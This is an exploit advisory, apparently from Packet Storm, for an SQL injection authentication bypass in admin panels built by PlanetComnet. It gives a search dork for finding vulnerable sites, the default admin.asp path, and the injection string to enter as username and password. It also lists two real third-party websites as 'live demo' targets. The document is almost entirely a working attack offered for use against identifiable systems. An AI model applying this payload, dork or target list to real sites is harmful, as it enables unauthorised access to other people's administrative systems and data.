PlanetComnet suffers from a remote SQL injection vulnerability that allows for authentication bypass.
2f4db3c2c0b9f021c546a543b9aa1ede950b9f3fa436cb4eeaa1b1adeeb7d626# Exploit Title: PlanetComnet Admin Auth Bypass
# Date: 14 June 2011
# Author: CriminalCoder
# Category: WebApps
# Software Link: www.planetcomnet.in
# Dork: inurl:admin.asp "Designed & Hosted by PlanetComnet"
# Tested on: Windows Xp SP3# Home: beyz4de.wordpress.com
[+] Default admin panel: http://localhost/admin.asp
./ ByPass the admin auth by using
Username : 'or''='Password : 'or''='
./ Live Demo ;
http://www.laxmimedical.com/admin.asphttp://www.mehrabandhu.in/admin.asp
Greetz: NosLeeP++ ~ Redd.é ~ SanaLTahriP ~ TechnicaL ~ TheMirkin
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed